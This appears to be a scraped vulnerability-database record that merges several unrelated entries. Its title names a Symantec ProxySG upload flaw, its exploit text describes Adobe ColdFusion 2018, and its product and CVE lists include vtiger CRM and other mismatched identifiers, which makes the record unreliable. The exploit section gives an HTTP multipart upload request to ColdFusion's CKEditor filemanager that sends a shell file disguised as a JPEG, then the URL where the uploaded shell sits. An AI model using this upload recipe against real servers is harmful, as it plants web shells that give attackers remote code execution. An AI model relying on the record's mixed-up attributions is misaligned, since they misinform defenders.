ID
VAR-E-201509-0122
CVE
| cve_id: | CVE-2015-6000 | Trust: 1.6 |
| cve_id: | CVE-2016-10258 | Trust: 1.0 |
| cve_id: | CVE-2016-1713 | Trust: 0.5 |
EDB ID
47392
TITLE
Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload - CFM webapps Exploit
Trust: 0.6
DESCRIPTION
Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload. CVE-2016-10258 . webapps exploit for CFM platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | symantec | model: | advanced secure gateway proxysg | scope: | eq | version: | / | Trust: 1.6 |
| vendor: | vtiger | model: | crm | scope: | eq | version: | 6.3 | Trust: 0.5 |
| vendor: | vtiger | model: | crm authenticated logo upload remote | scope: | eq | version: | 6.3.0 | Trust: 0.5 |
EXPLOIT
===========Security Intelligence============
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# Exploit Author: Pankaj Kumar Thakur (Nepal)
==========[Table of Contents]==============
* Overview
* Detailed description
* Thanks & Acknowledgements
* References
==========[Vulnerability Information]========
* Unrestricted file upload in Adobe ColdFusion 2018
* CWE-434
* Base Score: 6.8 MEDIUM
* Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
=========[ Overview]=========================
* System Affected: Adobe ColdFusion 2018
* Impact: Unrestricted file upload
=====[ Detailed description]=================
Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
Request
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: hostname:portno
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Content-Type: multipart/form-data;
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
.
.
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file with extension"
Content-Type: image/jpeg
shell code
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
.
.
After uploading shell, its located here
http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
=====[ Thanks & Acknowledgements]========================================
* Acknowledged by Adobe
* Duplicate
* https://nvd.nist.gov/vuln/detail/CVE-2016-10258
* https://www.cvedetails.com/cve/CVE-2016-1713/
* https://www.openwall.com/lists/oss-security/2016/01/12/4
=====[ EOF ]===========================================================
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Unrestricted File Upload
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | remote | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
| tag: | php | Trust: 0.5 |
CREDITS
Pankaj Kumar Thakur
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2015-6000 | Trust: 2.2 |
| db: | NVD | id: | CVE-2016-1713 | Trust: 2.1 |
| db: | NVD | id: | CVE-2016-10258 | Trust: 1.6 |
| db: | OPENWALL | id: | OSS-SECURITY/2016/01/12/4 | Trust: 1.6 |
| db: | EXPLOIT-DB | id: | 47392 | Trust: 1.6 |
| db: | EDBNET | id: | 81484 | Trust: 0.6 |
| db: | EDBNET | id: | 101977 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 24304 | Trust: 0.6 |
| db: | EDBNET | id: | 23912 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 133755 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 148753 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-6000 | Trust: 1.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2016-10258 | Trust: 1.0 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/47392/ | Trust: 0.6 |
| url: | https://0day.today/exploits/24304 | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2016-1713 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 133755 |
| db: | PACKETSTORM | id: | 148753 |
| db: | EXPLOIT-DB | id: | 47392 |
| db: | EDBNET | id: | 81484 |
| db: | EDBNET | id: | 101977 |
| db: | EDBNET | id: | 23912 |
LAST UPDATE DATE
2022-07-27T09:29:58.396000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 133755 | date: | 2015-09-29T01:09:53 |
| db: | PACKETSTORM | id: | 148753 | date: | 2018-07-30T22:24:57 |
| db: | EXPLOIT-DB | id: | 47392 | date: | 2019-09-16T00:00:00 |
| db: | EDBNET | id: | 81484 | date: | 2015-09-29T00:00:00 |
| db: | EDBNET | id: | 101977 | date: | 2019-09-16T00:00:00 |
| db: | EDBNET | id: | 23912 | date: | 2015-09-28T00:00:00 |